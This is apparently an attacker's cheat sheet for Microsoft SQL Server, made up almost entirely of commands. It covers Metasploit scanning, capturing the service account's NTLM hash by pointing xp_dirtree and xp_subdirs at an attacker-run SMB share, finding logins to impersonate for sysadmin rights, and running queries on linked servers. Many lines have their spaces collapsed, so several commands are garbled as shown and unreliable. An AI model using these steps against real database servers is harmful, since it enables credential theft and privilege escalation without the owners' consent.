# MSSQL Ping in Metasploit using mssql_ping auxiliary scannermsf6auxiliary(scanner/mssql/mssql_ping) >setrhostsipmsf6auxiliary(scanner/mssql/mssql_ping) >run
Capture MSSQL Service Hash
# Start responder or impacket-smbserversudoresponder-Itun0sudoimpacket-smbservershare./-smb2support# XP_DIRTREE Hash Stealing1> EXEC master..xp_dirtree '\\\\10.10.110.17\\share\\'2> GO# XP_SUBDIRS Hash Stealing1> EXEC master..xp_subdirs '\\\\10.10.110.17\\share\\'2> GO
Impersonate Existing Users with MSSQL
# Identify Users that We Can Impersonate1> SELECT distinct b.name2> FROM sys.server_permissions a3> INNER JOIN sys.server_principals b4> ON a.grantor_principal_id = b.principal_id5> WHERE a.permission_name = 'IMPERSONATE'6> GO# Verifying our Current User and Role# 0 means do not have sysadmin role# 1 means we have sysadmin role1> SELECT SYSTEM_USER2> SELECT IS_SRVROLEMEMBER('sysadmin')3> go# Impersonating the desired User1> EXECUTE AS LOGIN = 'User'2> SELECT SYSTEM_USER3> SELECT IS_SRVROLEMEMBER('sysadmin')4> GO
Communicate with Other Databases with MSSQL
# 1 means remote server# 0 means linked server# Identify linked Servers in MSSQL1> SELECT srvname, isremote FROM sysservers2> GO# Execute Commands using EXECUTE statement# '10.0.0.12\\SQLEXPRESS' is a linked server 1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\\SQLEXPRESS]2> GO
# finding mssqlclient.pylocatemssqlclient.py/usr/bin/impacket-mssqlclient/usr/share/doc/python3-impacket/examples/mssqlclient.py# To Connect to mssql server with valid credspython3mssqlclient.pyAdministrator@ip-windows-auth# Useful Commands : <https://www.sqlshack.com/working-sql-server-command-line-sqlcmd/># to list the databasesselect name from sys.databases